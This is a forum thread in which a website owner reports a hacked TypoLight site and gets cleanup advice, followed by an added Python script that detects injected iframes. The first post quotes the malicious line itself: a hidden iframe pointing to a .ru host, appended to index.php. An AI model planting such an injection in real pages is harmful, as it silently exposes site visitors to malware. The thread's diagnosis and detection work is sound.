Thread: problem with a hack of my TL website

  1. #1

    problem with a hack of my TL website

    Hello there,
    I used TL for 2 websites, and I had the same problem on both. One was with the last version and the other is 2.7.1.

    I had a blank page (I wasn't modifying or uploading files), so I checked the source code and saw a few HTML lines like this:

    Code:
    <div style="display:none">qyzwbuhudmcueanzyzepqgmhqzdljzo<iframe width=364 height=882 src="http://check-your-iq.ru:8080/index.php" ></iframe></div>
    I checked index.php of TL, and this line was at the end of the file.

    Do you know if there is a problem with TL security, or do you know this kind of hack and how to counter it? (I asked to change the FTP and MySQL password)

    thanks !

  2. #2
    User
    Join Date
    06-19-09.
    Location
    Elbląg, Poland
    Posts
    152

    Re: problem with a hack of my TL website

    Maybe I'm wrong, but some time ago there was a virus which stole FTP passwords from TotalCommander and FileZilla, and then it connected to servers and added one line of code to index.php. What FTP client do you use?
    Marcin

    http://www.contao.pl - Polish Support Site
    http://forum.contao.pl - Polish Contao community forum


    -----------------------
    Need custom template? Feel free to contact me by e-mail marcin@contao.pl

  3. #3

    Re: problem with a hack of my TL website

    I'm using FileZilla atm; my antivirus (Kaspersky) detects nothing, I hope it's gone.

  4. #4
    Core developer
    Official Contao Team
    Join Date
    06-04-09.
    Location
    Wuppertal, Germany
    Posts
    201

    Re: problem with a hack of my TL website

    A couple of FileZilla hacks have been reported in the German forum, too. Use WinSCP if you can, it is the best open source FTP client on the market. And make sure to change ALL passwords if you have been hacked!

  5. #5
    Experienced user
    Join Date
    06-20-09.
    Posts
    1,311

    Re: problem with a hack of my TL website

    Quote:
    i'm using filezilla atm, my antivir (kaspersky) detect nothing i hope it's gone
    It won't be. :cry:
    This thing is evil if it turns out to be the one qrczak is talking about. It'll be all through your sites, and probably all other sites of anyone on your shared host (if you use shared hosting).

    Download and run Avast antivirus http://www.avast.com/eng/download-avast-home.html, it should find a rootkit.
    I'd also FTP transfer all your site files onto your computer, so Avast can run through the lot and tell you which ones are infected. This will help you figure out how to get rid of it.
    Let us know what you find.

  6. #6

    Re: problem with a hack of my TL website

    Hi there,
    I managed to clear my computer and the infected websites.
    It was a gumblar/martuz-like virus, like you said. I maybe had a trojan which grabbed my FTP passwords and then modified my index, default... pages.
    I did an online virus scan with Trend Micro, I corrected my corrupted files (searching for the <iframe> tag is nice) and then changed the FTP password, and everything is OK now.

    thanks for help.
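
The cleanup step mentioned in the last post, searching site files for the `<iframe>` tag, can be scripted over a downloaded copy of the site. The following is an added example, not code from the thread or from the TL/Contao project; the function names, the extension list, the `own_hosts` allow-list and the placeholder host `injected.example` are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# <iframe ... src=http(s)://...> with quoted or unquoted src, as in the injected line.
IFRAME_RE = re.compile(r'<iframe\b[^>]*?\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)
# Heuristic: a hiding style earlier on the same line (the injected <div> wrapper).
HIDDEN_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)
WEB_EXT = {".php", ".html", ".htm", ".html5", ".tpl", ".js"}

# Constructed sample modelled on the line quoted in post #1 (placeholder host).
SAMPLE = ('<?php echo "page"; ?>\n'
          '<div style="display:none">abc<iframe width=364 height=882 '
          'src="http://injected.example:8080/index.php" ></iframe></div>\n')

def find_foreign_iframes(text, own_hosts=()):
    """Return one dict per iframe whose src host is not in own_hosts."""
    lines = text.splitlines()
    last = max((i for i, l in enumerate(lines) if l.strip()), default=-1)
    hits = []
    for i, line in enumerate(lines):
        for m in IFRAME_RE.finditer(line):
            host = urlsplit(m.group(1)).hostname or ""
            if host in own_hosts:
                continue  # legitimate embed from the site's own host
            hits.append({
                "line": i + 1,
                "url": m.group(1),
                "hidden": bool(HIDDEN_RE.search(line[:m.start()])),
                "at_end_of_file": i == last,  # the thread's injection was appended
            })
    return hits

def scan_tree(root, own_hosts=()):
    """Scan web files under root; return {path: hits} for files with findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXT:
            hits = find_foreign_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    for hit in find_foreign_iframes(SAMPLE):
        print(hit)
```

A hit that is both `hidden` and `at_end_of_file` matches the pattern described in post #1; other hits may be legitimate embeds and need a manual look.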
